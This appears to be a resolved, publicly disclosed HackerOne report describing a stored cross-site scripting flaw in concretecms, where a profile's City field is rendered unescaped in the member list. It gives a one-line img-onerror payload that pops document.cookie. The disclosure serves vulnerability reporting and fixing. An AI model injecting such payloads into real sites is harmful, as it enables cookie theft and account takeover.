XSS IN member List (Because of City Textbox)

Disclosed: 2014-04-16 10:48:51 By atom To concretecms
Unknown
Vulnerability Details
Proof: http://prntscr.com/348q0v 1st: go to your profile Edit your Address and City and put this code "><img src=xonerror=alert(document.cookie)>
Actions
View on HackerOne
Report Stats
  • Report ID: 4839
  • State: Closed
  • Substate: resolved
  • Upvotes: 4
Share this report